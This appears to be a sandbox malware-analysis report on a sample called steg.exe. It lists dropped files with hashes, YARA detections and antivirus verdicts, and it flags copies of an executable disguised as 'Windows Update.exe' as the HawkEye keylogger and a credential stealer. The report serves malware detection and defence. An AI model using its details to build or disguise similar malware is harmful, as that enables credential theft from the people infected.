                                                                                                                  C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_windows update.e_436621b0be9536334964869bf89e95685ea4f5_00000000_15c9a667\Report.wer

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                                                                                                  File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):65536
                                                                                                                  Entropy (8bit):1.308745717009357
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:192:Vpgu5sGzOe63aPLk9Mg5N3gFm1pzvTkyK81X+tXyXyE/u7siS274It:J5siOjayRvw06nE/u7siX4It
                                                                                                                  MD5:B342D04C5AE75D98E4FAEB0840B0B5F2
                                                                                                                  SHA1:F8FEB8B0BA5852FED3A968B56EC0C31979DA7379
                                                                                                                  SHA-256:E6FA2CC142861D08C8BE0D2BD56486245936A8FC6CB6C6DE142B774EA30CB8E9
                                                                                                                  SHA-512:B82C039FBF572D8EA2CA8454988E3D8E13CA79BEDD8D30E3D3260EF408FDED28FA04636C74AC4AFD7DF2B45A99610447414E5AAC596CE716BE542EDF85172893
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.2.9.2.3.9.0.1.7.8.3.0.4.1.3.3.0.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.9.2.3.9.0.1.7.9.2.1.0.3.6.9.4.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.0.4.1.e.7.6.9.-.1.6.e.d.-.4.0.1.b.-.8.8.3.a.-.2.f.0.2.4.e.6.c.2.f.d.d.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.S.t.u.b...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.6.f.4.-.0.0.0.1.-.0.0.1.c.-.b.9.d.d.-.7.2.9.5.9.5.3.d.d.8.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.7.b.9.f.5.b.c.b.3.4.3.d.1.3.2.4.c.4.6.6.7.3.1.b.0.0.7.c.1.f.8.e.0.0.0.0.0.0.0.0.!.0.0.0.0.d.7.0.2.f.f.a.a.c.8.b.f.3.5.f.3.3.7.2.e.f.2.c.3.1.0.b.2.1.e.e.f.8.a.9.1.f.6.e.a.!.W.i.n.d.o.w.s. .U.p.d.a.t.e...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.1.5././.0.4././.0.9.:.0.4.:.5.8.:.4.6.!.0.!.W.i.n.d.o.w.s. .U.p.d.a.t.e...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.

                                                                                                                  C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_windows update.e_436621b0be9536334964869bf89e95685ea4f5_00000000_17493f51\Report.wer

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                                                                                                  File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):65536
                                                                                                                  Entropy (8bit):1.3149700454264321
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:192:VKMk/sGzNe63aKsn9fbeN9M2v1zzv9kXZKIgjIRcMbu/u7siS274It:G/siNjaEdvO1nbu/u7siX4It
                                                                                                                  MD5:9DD407AF23C9BED0015D6D10A84A29D3
                                                                                                                  SHA1:FD2A24B6E56730ABD196C6AE99500A58260ECD19
                                                                                                                  SHA-256:CD3D2B403E849B3415E6710305A7FA1C3424C515F9F082180DFB0688324C13B2
                                                                                                                  SHA-512:388AD6A72B0103CC554E7FCE22118DBE7CE95EC4446F4478B185594468E6075BD67B2322BFD7144F73C45EE8E1ADF05C1E7E536AD20B06451F1C7CAF4AD91D4A
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.2.9.2.3.9.0.1.5.1.7.6.2.6.7.0.4.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.9.2.3.9.0.1.5.2.5.1.2.6.5.5.6.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.2.2.c.d.e.e.3.-.8.0.2.2.-.4.8.1.7.-.8.c.b.0.-.e.2.1.e.c.1.d.6.d.1.f.2.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.S.t.u.b...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.b.5.8.-.0.0.0.1.-.0.0.1.c.-.2.0.3.8.-.a.1.8.6.9.5.3.d.d.8.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.7.b.9.f.5.b.c.b.3.4.3.d.1.3.2.4.c.4.6.6.7.3.1.b.0.0.7.c.1.f.8.e.0.0.0.0.0.0.0.0.!.0.0.0.0.d.7.0.2.f.f.a.a.c.8.b.f.3.5.f.3.3.7.2.e.f.2.c.3.1.0.b.2.1.e.e.f.8.a.9.1.f.6.e.a.!.W.i.n.d.o.w.s. .U.p.d.a.t.e...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.1.5././.0.4././.0.9.:.0.4.:.5.8.:.4.6.!.0.!.W.i.n.d.o.w.s. .U.p.d.a.t.e...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.

                                                                                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WER37AF.tmp.WERInternalMetadata.xml

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                                                                                                  File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):7638
                                                                                                                  Entropy (8bit):3.685492785123007
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:192:Rrl7r3GLNig56Pgv6YRO6+gmfZiSW+p1b61f2Jm:RrlsNiO6I6Yo6+gmf4SbbQfp
                                                                                                                  MD5:866A56B5FB111E45F768C6284D40346F
                                                                                                                  SHA1:95432D9402FD807511804CFF3B4D70056BC4FA89
                                                                                                                  SHA-256:A4D82922BBDCE338B22C867B0652C0265B116F54DBBFA7F617DDB323A3C15377
                                                                                                                  SHA-512:0410944F05D7B4C9C864F75A4A7F6C22E30F361FD95E4D2907A355376ABF0F8DC13D0247E04822037B8983B3EE4BF78DD59E2E6A52B4DEB08CE9304D047602C2
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.0.0.0.<./.P.i.d.>.......

                                                                                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WER3918.tmp.xml

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):4693
                                                                                                                  Entropy (8bit):4.449132467269561
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:48:cvIwSD8zsfJgtWI9SMWgc8sqYji8fm8M4JFK85xFJO+q8vj5AC+dOnVQEAEd:uITfBtlgrsqYrJFKy4KdACzVQEAEd
                                                                                                                  MD5:0C8D726E73F002B17F723F950C9CF9B8
                                                                                                                  SHA1:ACD71058C2FD5FCDDFF9F3BF7DAC96CCB4613D50
                                                                                                                  SHA-256:4467028406D5764C380B8E97DADFEA283CCE0105759D3A93623477BE88868E2A
                                                                                                                  SHA-512:4CA85B157BF51EAEA19259E34CAF163939F338C4E493A8F0057AE75629A754CF6245AAA310E9F257A137402138465B7E3C38BBD4B8CC121B5E8C8F54F3E328B9
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1437826" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

                                                                                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WER9F91.tmp.WERInternalMetadata.xml

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                                                                                                  File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):7642
                                                                                                                  Entropy (8bit):3.684063614647202
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:192:Rrl7r3GLNi7g6I6YO+6ZgmfZiSW+p1Ny1f8Pm:RrlsNi86I6Yf6Zgmf4SbNofJ
                                                                                                                  MD5:D115B32576A0D5FFD2448BFB47AF4C9A
                                                                                                                  SHA1:574BC5FF44E734B18CB42E6ACB97F441CCAD1360
                                                                                                                  SHA-256:BBF66801682AE643BF8CDDAFF2225C5C529E6FB40694306B8FF0FACB75664EEC
                                                                                                                  SHA-512:5E781A249369F6D2255717BAFD44F0C0BEF88AEE7697077FB469F594DC2AC8D33D5AC8F3E3C4C0DFE4551CE4ECCD3BC0303BD1071C89B87EAECAC16C717C79F9
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.8.7.6.<./.P.i.d.>.......

                                                                                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WERA157.tmp.xml

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):4693
                                                                                                                  Entropy (8bit):4.450845819338463
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:48:cvIwSD8zsfJgtWI9SMWgc8sqYjsz8fm8M4JFK85xFg+q8vj52z6+dOnVQEREd:uITfBtlgrsqYPJFKyMKdq6zVQEREd
                                                                                                                  MD5:9AA1F9B81F8152D17378B8C185247354
                                                                                                                  SHA1:B7A2AD40F56ED159255C18CA4BF67D2DD99F64FB
                                                                                                                  SHA-256:407DC00DC0733E4EC0225CC6FB9A89868954CD408ECC08AE5D76AB0C5DB47102
                                                                                                                  SHA-512:934F4FC98C318712844166E7CB5E8BA8B0320DB7F50F306BB50DF8D4AE434F9AAC69F03EBCDDB8FD87EB5DB5792AE07F9D3CEFB4C0626213C08296A8B94C08A9
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1437826" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

                                                                                                                  C:\Users\user\AppData\Local\Microsoft\CLR_v2.0_32\UsageLogs\WindowsUpdate.exe.log

                                                                                                                  Download File
                                                                                                                  Process:C:\Users\user\AppData\Roaming\WindowsUpdate.exe
                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):664
                                                                                                                  Entropy (8bit):5.288448637977022
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:12:Q3LaJU20NaL10Ug+9Yz9t0U29hJ5g1B0U2ukyrFk70U2xANlW3ANv:MLF20NaL3z2p29hJ5g522rW2xAi3A9
                                                                                                                  MD5:B1DB55991C3DA14E35249AEA1BC357CA
                                                                                                                  SHA1:0DD2D91198FDEF296441B12F1A906669B279700C
                                                                                                                  SHA-256:34D3E48321D5010AD2BD1F3F0B728077E4F5A7F70D66FA36B57E5209580B6BDC
                                                                                                                  SHA-512:BE38A31888C9C2F8047FA9C99672CB985179D325107514B7500DDA9523AE3E1D20B45EACC4E6C8A5D096360D0FBB98A120E63F38FFE324DF8A0559F6890CC801
                                                                                                                  Malicious:true
                                                                                                                  Reputation:unknown
                                                                                                                  Preview:1,"fusion","GAC",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System\1ffc437de59fb69ba2b865ffdc98ffd1\System.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.VisualBas#\cd7c74fce2a0eab72cd25cbe4bb61614\Microsoft.VisualBasic.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\54d944b3ca0ea1188d700fbd8089726b\System.Drawing.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\bd8d59c984c9f5f2695f64341115cdf0\System.Windows.Forms.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Runtime.Remo#\35774dc3cd31b4550ab06c3354cf4ba5\System.Runtime.Remoting.ni.dll",0..

                                                                                                                  C:\Users\user\AppData\Local\Microsoft\CLR_v2.0_32\UsageLogs\steg.exe.log

                                                                                                                  Download File
                                                                                                                  Process:C:\Users\user\Desktop\steg.exe
                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                  Category:modified
                                                                                                                  Size (bytes):664
                                                                                                                  Entropy (8bit):5.288448637977022
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:12:Q3LaJU20NaL10Ug+9Yz9t0U29hJ5g1B0U2ukyrFk70U2xANlW3ANv:MLF20NaL3z2p29hJ5g522rW2xAi3A9
                                                                                                                  MD5:B1DB55991C3DA14E35249AEA1BC357CA
                                                                                                                  SHA1:0DD2D91198FDEF296441B12F1A906669B279700C
                                                                                                                  SHA-256:34D3E48321D5010AD2BD1F3F0B728077E4F5A7F70D66FA36B57E5209580B6BDC
                                                                                                                  SHA-512:BE38A31888C9C2F8047FA9C99672CB985179D325107514B7500DDA9523AE3E1D20B45EACC4E6C8A5D096360D0FBB98A120E63F38FFE324DF8A0559F6890CC801
                                                                                                                  Malicious:true
                                                                                                                  Reputation:unknown
                                                                                                                  Preview:1,"fusion","GAC",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System\1ffc437de59fb69ba2b865ffdc98ffd1\System.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.VisualBas#\cd7c74fce2a0eab72cd25cbe4bb61614\Microsoft.VisualBasic.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\54d944b3ca0ea1188d700fbd8089726b\System.Drawing.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\bd8d59c984c9f5f2695f64341115cdf0\System.Windows.Forms.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Runtime.Remo#\35774dc3cd31b4550ab06c3354cf4ba5\System.Runtime.Remoting.ni.dll",0..

                                                                                                                  C:\Users\user\AppData\Local\Temp\SysInfo.txt

                                                                                                                  Download File
                                                                                                                  Process:C:\Users\user\Desktop\steg.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):48
                                                                                                                  Entropy (8bit):4.304047012067739
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:oNt+kiEaKC59KuCa:oNwknaZ5v
                                                                                                                  MD5:7C20EC9581869DA3A05E18186353A4B2
                                                                                                                  SHA1:210CC52C845FF85B36F422F4C36CA29DB3666482
                                                                                                                  SHA-256:23B52B6D0ABD0A0D20690B742429AD1B465D7050535E8FDDB85BF45A8498A4B0
                                                                                                                  SHA-512:4CED524729759783EA4783EE98650E6D912D8DAC53386E2DA3C812FE83F40FB1EB97C71521DF380191D399E284D0D94126BD5FC2CBD18B76142EC3A9E97FADA0
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview:C:\Users\user\AppData\Roaming\WindowsUpdate.exe

                                                                                                                  C:\Users\user\AppData\Roaming\Windows Update.exe

                                                                                                                  Download File
                                                                                                                  Process:C:\Users\user\Desktop\steg.exe
                                                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):1167872
                                                                                                                  Entropy (8bit):6.562432865407771
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:24576:IoLTkXBwWja4SlukeeKL0xJaqT//aqT8E94Tf3C:Nx6
                                                                                                                  MD5:30747BB37997B54D37BAE65AE590B7E8
                                                                                                                  SHA1:D702FFAAC8BF35F3372EF2C310B21EEF8A91F6EA
                                                                                                                  SHA-256:A39F2E3D1A27BD091C689A09499B374E5F6743DE23B42BFD9C7A17C1D49DFAD7
                                                                                                                  SHA-512:CBC7864F127574F1BCB20A442B83D394320BF325F73E75BC6FA8A2EDBBC568EF79973820A672F2340BA5379B9E6EA12C3BB518346B4D702280E9F595D2722322
                                                                                                                  Malicious:true
                                                                                                                  Yara Hits:
                                                                                                                  • Rule: SecurityXploded_Producer_String, Description: Detects hacktools by SecurityXploded, Source: C:\Users\user\AppData\Roaming\Windows Update.exe, Author: Florian Roth
                                                                                                                  • Rule: JoeSecurity_EmailPasswordDump_Tool, Description: Yara detected EmailPasswordDump Tool by SecurityXploded, Source: C:\Users\user\AppData\Roaming\Windows Update.exe, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Roaming\Windows Update.exe, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: C:\Users\user\AppData\Roaming\Windows Update.exe, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_BrowserPasswordDump_Tool, Description: Yara detected BrowserPasswordDump Tool by SecurityXploded, Source: C:\Users\user\AppData\Roaming\Windows Update.exe, Author: Joe Security
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                  • Antivirus: ReversingLabs, Detection: 88%
                                                                                                                  Reputation:unknown
                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....&U.....................4........... ........@.. ....................... ............@....................................O........2........................................................................... ............... ..H............text...$.... ...................... ..`.rsrc....2.......2..................@..@.reloc..............................@..B........................H...........L................U..........................................2s..........*....0...........~......(......~....o....~....o..........9.......~....o.........+G~.....o......o........,)...........,.~.....~.....o....o.......................1.~.....~....o......o.....~....~....o....o......~.....(....s....o..........(.........*...................0.. .........(....(..........(.....o......*....................(......(.......o.......o.......o.......o......*.R..(....o....o......

                                                                                                                  C:\Users\user\AppData\Roaming\Windows Update.exe:Zone.Identifier

                                                                                                                  Download File
                                                                                                                  Process:C:\Users\user\Desktop\steg.exe
                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):26
                                                                                                                  Entropy (8bit):3.95006375643621
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:ggPYV:rPYV
                                                                                                                  MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                  SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                  SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                  SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                  Malicious:true
                                                                                                                  Reputation:unknown
                                                                                                                  Preview:[ZoneTransfer]....ZoneId=0

                                                                                                                  C:\Users\user\AppData\Roaming\WindowsUpdate.exe

                                                                                                                  Download File
                                                                                                                  Process:C:\Users\user\AppData\Roaming\Windows Update.exe
                                                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):1167872
                                                                                                                  Entropy (8bit):6.562432865407771
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:24576:IoLTkXBwWja4SlukeeKL0xJaqT//aqT8E94Tf3C:Nx6
                                                                                                                  MD5:30747BB37997B54D37BAE65AE590B7E8
                                                                                                                  SHA1:D702FFAAC8BF35F3372EF2C310B21EEF8A91F6EA
                                                                                                                  SHA-256:A39F2E3D1A27BD091C689A09499B374E5F6743DE23B42BFD9C7A17C1D49DFAD7
                                                                                                                  SHA-512:CBC7864F127574F1BCB20A442B83D394320BF325F73E75BC6FA8A2EDBBC568EF79973820A672F2340BA5379B9E6EA12C3BB518346B4D702280E9F595D2722322
                                                                                                                  Malicious:true
                                                                                                                  Yara Hits:
                                                                                                                  • Rule: SecurityXploded_Producer_String, Description: Detects hacktools by SecurityXploded, Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe, Author: Florian Roth
                                                                                                                  • Rule: JoeSecurity_EmailPasswordDump_Tool, Description: Yara detected EmailPasswordDump Tool by SecurityXploded, Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_BrowserPasswordDump_Tool, Description: Yara detected BrowserPasswordDump Tool by SecurityXploded, Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe, Author: Joe Security
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                  • Antivirus: ReversingLabs, Detection: 88%
                                                                                                                  Reputation:unknown
                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....&U.....................4........... ........@.. ....................... ............@....................................O........2........................................................................... ............... ..H............text...$.... ...................... ..`.rsrc....2.......2..................@..@.reloc..............................@..B........................H...........L................U..........................................2s..........*....0...........~......(......~....o....~....o..........9.......~....o.........+G~.....o......o........,)...........,.~.....~.....o....o.......................1.~.....~....o......o.....~....~....o....o......~.....(....s....o..........(.........*...................0.. .........(....(..........(.....o......*....................(......(.......o.......o.......o.......o......*.R..(....o....o......

                                                                                                                  C:\Users\user\AppData\Roaming\WindowsUpdate.exe:Zone.Identifier

                                                                                                                  Download File
                                                                                                                  Process:C:\Users\user\AppData\Roaming\Windows Update.exe
                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                  Category:modified
                                                                                                                  Size (bytes):26
                                                                                                                  Entropy (8bit):3.95006375643621
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:ggPYV:rPYV
                                                                                                                  MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                  SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                  SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                  SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                  Malicious:true
                                                                                                                  Reputation:unknown
                                                                                                                  Preview:[ZoneTransfer]....ZoneId=0

                                                                                                                  C:\Users\user\AppData\Roaming\pid.txt

                                                                                                                  Download File
                                                                                                                  Process:C:\Users\user\AppData\Roaming\Windows Update.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):4
                                                                                                                  Entropy (8bit):2.0
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Ign:Ig
                                                                                                                  MD5:FDC0EB412A84FA549AFE68373D9087E9
                                                                                                                  SHA1:6E56295615BE063470CE266ABB0F949F84090CCD
                                                                                                                  SHA-256:E5FCF24812E6585EAC0EA6F1A5E3AB5A16B8C2B9568C10B4175EA088AAEAE014
                                                                                                                  SHA-512:6CE827A2F598C3C3E56D4BBE94632663848E24AAAB476302E905624EAD8047CB03119CA5655009ABD71FCE493089A7E654298CD9D93FAE2A99101E5E637B29DC
